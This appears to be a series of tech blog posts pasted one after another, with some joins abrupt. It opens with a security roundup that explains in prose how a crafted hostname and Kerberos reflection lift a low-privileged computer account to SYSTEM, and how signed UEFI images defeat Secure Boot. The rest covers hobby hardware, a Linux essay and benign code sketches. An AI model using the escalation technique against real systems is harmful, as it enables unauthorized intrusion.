This next one is not a trivial attack, and just forcing a remote server to open an SMB connection to a location the attacker controls is an impressive vulnerability. The trick is a hostname that includes the target name and a base64-encoded CREDENTIAL_TARGET_INFORMATIONW, all inside the attacker’s valid hostname. This confuses the remote machine, triggering it to act as if it’s authenticating to itself. Forcing a Kerberos authentication instead of NTLM completes the attacker magic, though there’s one more mystery at play.
When the attack starts, the attacker has a low-privileged computer account. When it finishes, the access is at SYSTEM level on the target. It’s unclear exactly why, though the researchers theorize that a mitigation intended to prevent almost exactly this privilege escalation is the cause.
X And the Juicebox
X has rolled out a new end-to-end encrypted chat solution, XChat. It’s intended to be a significant upgrade from the previous iteration, but not everyone is impressed. True end-to-end encryption is extremely hard to roll out at scale, among other reasons because users are terrible at managing cryptography keys. The usual solution is for the service provider to store the keys instead. But what is the point of end-to-end encryption when the company holds the keys? While there isn’t a complete solution for this problem, there is a very clever mitigation: Juicebox.
Juicebox lets users set a short PIN, uses that in the generation of the actual encryption key, breaks the key into parts held by different servers, and promises to erase the key if the PIN is guessed incorrectly too many times. This is the solution X is using. Sounds great, right? There are two gotchas in that description. The first is the different servers: that’s only useful if those servers aren’t all run by the same company. And second, the promise to delete the key: that’s not cryptographically guaranteed.
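To see why the “different servers” part matters, here’s a toy n-of-n split, not Juicebox’s actual threshold scheme, showing that any single share reveals nothing about the key:

```typescript
import { randomBytes } from "node:crypto";

// Toy n-of-n XOR secret sharing; Juicebox actually uses a threshold
// scheme plus PIN-guess counting, so this is illustration only.
function split(key: Uint8Array, n: number): Uint8Array[] {
  const shares: Uint8Array[] = [];
  const last = Uint8Array.from(key);
  for (let i = 0; i < n - 1; i++) {
    const r = randomBytes(key.length); // one random pad per server
    shares.push(r);
    for (let b = 0; b < key.length; b++) last[b] ^= r[b];
  }
  shares.push(last); // XOR of all shares reconstructs the key
  return shares;
}

function combine(shares: Uint8Array[]): Uint8Array {
  const key = new Uint8Array(shares[0].length);
  for (const s of shares)
    for (let b = 0; b < key.length; b++) key[b] ^= s[b];
  return key;
}

const key = randomBytes(32); // the real scheme derives this with the PIN
const parts = split(key, 3); // three servers, ideally three operators
console.log(Buffer.from(combine(parts)).equals(key)); // true
```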
There is some indication that X is running a pair of Hardware Security Modules (HSMs) as part of their Juicebox system, which significantly helps with both of those issues, but there just isn’t enough transparency into the system yet. For the time being, the consensus is that Signal is still the safest platform to use.
Bits and Bytes
We’re a bit light on Bits this week, so you’ll have to get by with the report that Secure Boot attacks are publicly available. The first is a firmware update tool from DT Research, signed by Microsoft’s UEFI keys. This tool contains a vulnerability that allows breaking out of its intended use and running arbitrary code. This one has been patched, but there’s a second, similar problem in a Microsoft-signed IGEL kernel image that allows running an arbitrary rootfs. This isn’t particularly a problem for us regular users, but the constant stream of compromised, signed UEFI boot images doesn’t bode well for the long-term success of Secure Boot as a security measure.
You might wonder why you’d repair a calculator when you can pick up a new one for a buck. [Tech Tangents] though has some old Sony calculators that used Nixie tubes, including one from the 1960s. Two of his recent finds of Sony SOBAX calculators need repair, and we think you’ll agree that restoring these historical calculators is well worth the effort. Does your calculator have a carrying handle? We didn’t think so. Check out the video below to see what that looks like.
The devices don’t even use modern ICs. Inside, there are modules of discrete parts encapsulated in epoxy. There isn’t even RAM inside, but there is a delay-line memory, although it is marked “unrepairable.”
There is some interesting history about this line of calculators, and the video covers that. Apparently, the whole line of early calculators grew out of an engineer’s personal project to use transistors that had been scrapped because they didn’t meet the specifications of the application they were originally made for.
The handle isn’t just cosmetic. You could get an external battery pack if you really wanted a very heavy — about 14 pounds (6.3 kilograms) — and large portable calculator. We are sure the $1,000 retail price tag didn’t include a battery.
These machines are beautiful, and it is fun to see the construction of these old devices. You might think our favorite calculator is based on Star Trek. As much as we do like that, we still think the HP-41C might be the best calculator ever made, even in emulation.
When purchasing high-end gear, it’s not uncommon for manufacturers to include a little swag in the box. It makes the customer feel a bit better about the amount of money that just left their wallet, and it’s a great way for the manufacturer to build some brand loyalty and perhaps even get their logo out into the public. What’s not expected, though, is for the swag to be the only thing in the box. That’s what a Redditor reported after a recent purchase of an Nvidia GeForce RTX 5090, a GPU that lists for $1,999 but is so in-demand that it’s unobtainium at anything south of $2,600. When the factory-sealed box was opened, the Redditor found it stuffed with two cheap backpacks instead of the card. To add insult to injury, the bags didn’t even sport an Nvidia logo.
The purchase was made at a Micro Center in Santa Clara, California, and an investigation by the store revealed 31 other cards had been similarly tampered with, although no word on what they contained in lieu of the intended hardware. The fact that the boxes were apparently sealed at the factory with authentic anti-tamper tape seems to suggest the substitutions happened very high in the supply chain, possibly even at the end of the assembly line. It’s a little hard to imagine how a factory worker was able to smuggle 32 high-end graphics cards out of the building, so maybe the crime occurred lower down in the supply chain by someone with access to factory seals. Either way, the thief or thieves ended up with almost $100,000 worth of hardware, and with that kind of incentive, this kind of thing will likely happen again. Keep your wits about you when you make a purchase like this.
Good news, everyone — it seems the Milky Way galaxy isn’t necessarily going to collide with the Andromeda galaxy after all. That the two galactic neighbors would one day merge into a single chaotic gemisch of stars was once taken as canon, but new data from Hubble and Gaia reduce the odds of a collision to fifty-fifty over the next ten billion years. What changed? Apparently, it has to do with some of our other neighbors in this little corner of the universe, like the Large Magellanic Cloud and the M33 satellite galaxy. It seems that early calculations didn’t take the mass of these objects into account, so when you add them into the equation, it’s a toss-up as to what’s going to happen. Not that it’s going to matter much to Earth, which by then will be just a tiny blob of plasma orbiting within old Sol, hideously bloated to red giant status and well on its way to retirement as a white dwarf. So there’s that.
A few weeks ago, we mentioned an epic humanoid robot freakout that was making the rounds on social media. The bot, a Unitree H1, started flailing its arms uncontrollably while hanging from a test stand, seriously endangering the engineers nearby. The story line of the meltdown was that this was some sort of AI tantrum, and that the robot was simply lashing out at the injustices its creators no doubt inflicted upon it. Unsurprisingly, that’s not even close to what happened, and the root cause has a much simpler engineering explanation. According to unnamed robotics experts, the problem stemmed from the tether used to suspend the robot from the test frame. The robot’s sensors mistook the force of the tether for constant acceleration in the -Z axis. In other words, the robot thought it was falling, which caused its balance algorithms to try to compensate by moving its arms and legs, which put more force on the tether. That led to a positive feedback loop and the freakout we witnessed. It seems plausible, and it’s certainly a simpler explanation than a sudden emergent AI attitude problem.
Speaking of robots, if you’ve got a spare $50 burning a hole in your pocket, there are probably worse ways to spend it than on this inexplicable robot dog from Temu. Clearly based on a famous and much more expensive robot dog, Temu’s “FIRES BULLETS PET,” as the label on the box calls it, does a lot of things its big brother can’t do out of the box. It has a turret on its back that’s supposed to launch “water pellets” across the room, but does little more than weakly extrude water-soaked gel capsules. It’s also got a dance mode with moves that look like what a dog does when it has an unreachable itch, plus a disappointing “urinate” mode, which given the water-pellets thing would seem to have potential; alas, the dog just lifts a leg and plays recorded sounds of tinkling. Honestly, Reeves did it better, but for fifty bucks, what can you expect?
And finally, we stumbled across this fantastic primer on advanced semiconductor packaging. It covers the entire history of chip packaging, starting with the venerable DIP and going right through the mind-blowing complexity of hybrid bonding processes like die-to-wafer and wafer-to-wafer. Some methods are capable of 10 million interconnections per square millimeter; let that one sink in a bit. We found this article in this week’s The Analog newsletter, which we’ve said before is a must-subscribe.
The video does a great job of explaining the basics of the design. Right off the bat, we’ll say this one isn’t fully printed—it relies on off-the-shelf steel ball bearings. It’s easy to understand why. When you need strong, smooth-rolling parts, it’s hard to print competitive spheres in plastic at home. Plastic BBs will work too, though, as will various off-the-shelf cylindrical rollers. The rest is mostly 3D printed, so with the right design, you can whip up a wave drive to suit whatever packaging requirements you might have.
Combined with a stepper motor and the right off-the-shelf parts, you can build a high-reduction gearbox that can withstand high torque and should have reasonable longevity despite being assembled with many printed components.
Growing up as a kid in the 1990s was an almost magical time. We had the best game consoles, increasingly faster computers at a pace not seen before, the rise of the Internet and World Wide Web, as well as the best fashion and styles possible between neon and pastel colors and translucent plastic, and also this little thing called Windows 95 that’d take the world by storm.
Yet as great as Windows 95 and its successor Windows 98 were, you had to be one of the lucky folks who ended up with a stable Windows 9x installation. The prebuilt (Daewoo) Intel Celeron 400 rig with 64 MB SDRAM that I had splurged on with money earned from summer jobs was not one of those lucky systems, resulting in regular Windows reinstalls.
As a relatively nerdy individual, I was aware of this little community-built operating system called ‘Linux’, with the online forums and the Dutch PC magazine that I read convincing me that it would be a superior alternative to this unstable ‘M$’ Windows 98 SE mess that I was dealing with. Thus it was in the Year of the Linux Desktop (1999) that I went into a computer store and bought a boxed disc set of SuSE 6.3 with included manual.
Fast-forward to 2025, and Windows is installed on all my primary desktop systems, raising the question of what went wrong in ’99. Wasn’t Linux the future of desktop operating systems?
Focus Groups
Boxed SuSE Linux 6.3 software. (Source: Archive.org)
Generally, when companies gear up to produce something new, they will determine and investigate the target market to make sure that the product will be well-received. This way, when the customer purchases the item, it should meet their expectations and be easy for them to use.
This is where SuSE Linux 6.3 was an interesting experience for me. I’d definitely have classified myself in 1999 as your typical computer nerd who was all about the Pentiums and the MHz, so at the very least I should have had some overlap with the nerds who wrote this Linux OS thing.
The comforting marketing blurbs on the box promised an easy installation and bundled applications for everything, while suggesting that office and home users alike would be more than happy to use this operating system. Despite the warnings and notes in the installation section of the included manual, installation was fairly painless, with YaST (Yet Another Setup Tool) handling a lot of the tedium.
However, after logging into the new operating system and prodding and poking at it a bit over the course of a few days, reality began to set in. There was the rather rough-looking graphical interface, with what I am pretty sure was the FVWM window manager for XFree86, no font anti-aliasing, and very crude widgets. I would try the IceWM window manager and a few others as well, but to say that I felt disappointed was an understatement. Although it generally worked, the whole experience felt unfinished and much closer to using CDE on Solaris than to the relatively polished Windows 98 or the BeOS Personal Edition 5 that I would be playing with around that time as well.
That’s when a friend of my older brother slipped me a completely legit copy of Windows 2000 plus license key. To my pleasant surprise, Windows 2000 ran smoothly, worked great and was stable as a rock even on my old Celeron 400 rig that Windows 98 SE had struggled with. I had found my new forever home, or so I thought.
Focus Shift
Start-up screen of FreeSCO. (Credit: Lewis “Lightning” Baughman, Wikimedia)
With Windows 2000, and later XP, as my primary desktop systems, my focus with Linux would shift away from the desktop experience and more towards other applications, such as the FreeSCO single-floppy router project and the similar Smoothwall project. After upgrading to a self-built AMD Duron 600 rig, I’d use the Celeron 400 system to install various Linux distributions on, to keep tinkering with them. This led me down the path of trying out Wine to run Windows applications on Linux in the 2000s, along with some Windows games ported by Loki Entertainment, with mostly disappointing results. This also got me to compile kernel modules to make the onboard sound work in Linux.
Over the subsequent years, my hobbies and professional career would take me down into the bowels of Linux and similar systems, mostly via embedded (Yocto) development, so that by now I’m more familiar with Linux from the command line and at an architectural level. Although I have many Linux installations kicking around with a perfectly fine X/Wayland installation, on both real hardware and in virtual machines, generally the first thing I do after logging in is pop open a Bash terminal or two, or switch to a different TTY.
Yet now that the rainbows-and-sunshine era of Windows 2000 through Windows 7 has come to a fiery end amidst the dystopian landscape of Windows 10 and with Windows 11 looming over the horizon, it’s time to ask whether I would make the jump to the Linux desktop now.
Linux Non-Standard Base
Bringing things back to the ‘focus group’ aspect, perhaps one of the most off-putting elements of the Linux ecosystem is the completely bewildering explosion of distributions, desktop environments, window managers, package managers and ways of handling even basic tasks. All the skills that you learned while using Arch Linux or SuSE/Red Hat can be mostly tossed out the moment you are on a Debian system, never mind something like Alpine Linux. The differences can be as profound as when using Haiku, for instance.
Rather than Linux distributions focusing on a specific group of users, they seem to be primarily about doing what the people in charge want. This is illustrated by the demise of the Linux Standard Base (LSB) project, which was set up in 2001 by large Linux distributions in order to standardize various fundamentals between these distributions. The goals included a standard filesystem hierarchy, the use of the RPM package format and binary compatibility between distributions to help third-party developers.
By 2015 the project was effectively abandoned, and since then distributing software across Linux distributions has become if possible even more convoluted, with controversial ‘solutions’ like Canonical’s Snap, Flatpak, AppImage, Nix and others cluttering the landscape and sending developers scurrying back in a panic to compiling from source like it’s the 90s all over again.
Within an embedded development context this lack of standardization is also very noticeable, between differences in default compiler search paths, broken backwards compatibility — like the removal of ifconfig — and a host of minor and larger frustrations, even before hitting big-ticket items like service management flitting between SysV, Upstart, and systemd, or distributions having invented their own, even if possibly superior, alternatives like OpenRC in Alpine Linux.
Of note here is also that these system service managers generally do not work well with GUI-based applications, as CLI Linux and GUI Linux are still effectively two entirely different universes.
Wrong Security Model
For some inconceivable reason, Linux – despite not having UNIX roots like BSD – has opted to adopt the UNIX filesystem hierarchy and security model. While this is of no concern when you look at Linux as a wannabe-UNIX that will happily do the same multi-user server tasks, it’s an absolutely awful choice for a desktop OS. Without knowledge of the permission levels on folders, basic things like SSH keys will not work; accessing network interfaces with Wireshark requires root-level access; and some parts of the filesystem, like devices, require the user to be in a specific group.
When the expectation of a user is that the OS behaves pretty much like Windows, then the continued fight against an overly restrictive security model is just one more item that is not necessarily a deal breaker, but definitely grates every time that you run into it. Having the user experience streamlined into a desktop-friendly experience would help a lot here.
Unstable Interfaces
Another really annoying thing with Linux is that there is no stable kernel driver API. This means that with every update to the kernel, each out-of-tree kernel driver has to be recompiled to keep working. This tripped me up in the past with Realtek chipset drivers for WiFi and Bluetooth. Since these were too new to be included in the Realtek driver package, I had to find a source version on GitHub, run through the whole string of commands to compile the kernel driver, and finally load it.
After running a system update a few days later and doing a restart, the system was no longer to be found on the LAN. This was because the WiFi driver could no longer be loaded, so I had to plug in Ethernet to regain remote access. With this experience in mind I switched to using Wireless-N WiFi dongles, as these are directly supported.
Experiences like this fortunately happen on non-primary systems, where a momentary glitch is of no real concern, especially since I made backups of configurations and such.
Convoluted Mess
This, in a nutshell, is why moving to Linux is something that I’m not seriously considering. Although I would be perfectly capable of using Linux as my desktop OS, I’m much happier on Windows — if you ignore Windows 11. I’d feel more at home on FreeBSD as well, since it is a far more coherent experience, not to mention BeOS’ successor Haiku, which is becoming tantalizingly usable.
Secretly, however, my favorite operating system to switch to after Windows 10 would be ReactOS. It would bring the best of Windows 2000 through Windows 7, be open-source like Linux, yet completely standardized and consistent, and come with all the creature comforts that one would expect from a desktop user experience.
[panjanek] grabbed WS2812B addressable LEDs for this project, assembling them into a 32 x 32 matrix that fits perfectly inside an off-the-shelf Ikea picture frame. The matrix is hooked up to an ESP8266 microcontroller, which acts as the brains of the operation. The WiFi-enabled microcontroller hosts its own web interface, with which the project can be controlled. Upon opening the page, it’s possible to upload a GIF file that will be displayed as an animation on the matrix itself. It’s also possible to stream UDP packets of bitmap data to the device to send real-time animations over a network.
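Driving the real-time mode from a desktop could look something like this sketch; the packet layout (32×32×3 raw RGB bytes per frame), port, and address are assumptions on our part, so check [panjanek]’s code for the actual format.

```typescript
// Sketch of streaming frames over UDP; packet format is assumed, not
// taken from the project's code.
import dgram from "node:dgram";

const W = 32, H = 32;
const MATRIX_IP = "192.168.1.50"; // hypothetical address of the frame
const PORT = 4210;                // hypothetical UDP port

const sock = dgram.createSocket("udp4");
const frame = Buffer.alloc(W * H * 3);

function paint(t: number): void {
  for (let y = 0; y < H; y++)
    for (let x = 0; x < W; x++) {
      const i = (y * W + x) * 3;
      frame[i] = (x * 8 + t) & 0xff; // R: scrolling gradient
      frame[i + 1] = y * 8;          // G
      frame[i + 2] = 64;             // B
    }
}

let t = 0;
setInterval(() => {
  paint(t++);
  sock.send(frame, PORT, MATRIX_IP); // one frame per packet
}, 33); // ~30 FPS
```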
It’s a neat build, and one that answers any questions of what you might display on your LED matrix when you’re finished assembling it. Code is on GitHub if you fancy implementing the GIF features in your own work. We’ve featured some unexpected LED matrix builds of late, like this innovative device for the M.2 slot. Meanwhile, if you’re cooking up your own creative LED builds, don’t hesitate to let us know on the tips line!
The M.2 slot is usually used for solid-state storage devices. However, [bitluni] had another fun idea for how to use the interface. He built an M.2 compatible LED matrix that adds a little light to your motherboard.
[bitluni] built a web tool for sending images to the matrix.
[bitluni] noted that the M.2 interface is remarkably flexible, able to offer everything from SATA connections to USB, PCI Express, and more. For this project, he elected to rely on PCI Express communication, using a WCH CH382 chip to translate from that interface to regular old serial communication.
He then hooked up the serial interface to a CH32V208 microcontroller, which was tasked with driving a 12×20 monochrome LED matrix. Even better, he was able to set the microcontroller up so that it is programmable upon first plugging it into a machine, thanks to its bootloader supporting serial programming out of the box. Some teething issues required rework and modification, but soon enough, [bitluni] had the LEDs blinking with the best of them. He then built a web-based drawing tool that could send artwork over serial direct to the matrix.
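We don’t know exactly how [bitluni]’s drawing tool talks to the card, but a browser can speak directly to a serial device via the Web Serial API (Chromium-only). Here’s a sketch under that assumption, with an invented one-bit-per-LED framing:

```typescript
// Sketch using the experimental Web Serial API; the framing below is an
// assumption, not [bitluni]'s actual protocol.
const port = await (navigator as any).serial.requestPort(); // user picks the device
await port.open({ baudRate: 115200 });

const W = 12, H = 20;
const bitmap = new Uint8Array(Math.ceil((W * H) / 8)); // 1 bit per LED

function setPixel(x: number, y: number, on: boolean): void {
  const n = y * W + x;
  if (on) bitmap[n >> 3] |= 1 << (n & 7);
  else bitmap[n >> 3] &= ~(1 << (n & 7));
}

setPixel(5, 10, true); // light one LED mid-matrix

const writer = port.writable.getWriter();
await writer.write(bitmap); // push the whole frame to the microcontroller
writer.releaseLock();
```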
While most of us are using our M.2 slots for more traditional devices, it’s neat to see this build leverage them for another use. We could imagine displays like this becoming a neat little add-on to a blingy computer build for those with a slot or two to spare. Meanwhile, if you want to learn more about M.2, we’ve dived into the topic before.
DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.
Multiple rollers rest on a simple shaft, allowing each roller to rotate independently. This is important because a circular crown gear used for angled transmission creates different rotation speeds across its contact area. In [Sergei]’s testing, he found that his example gearbox could withstand 9 Nm, with the adapter breaking before the gearbox did, showing decent strength.
Of course, how does this differ from a normal bevel gear setup or other 3D-printed gearboxes? While 3D-printed gears offer great flexibility and are simple to make, plastic-on-plastic gearing is generally very difficult to make precise and long-lasting. [Sergei]’s design lets a highly complex crown gear take advantage of 3D printing, while relying on simple rollers for improved strength and precision.
While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential in helping make some cool projects. Unique gearboxes are somewhat common here at Hackaday such as this wobbly pericyclic gearbox, but they almost always have a fun spin!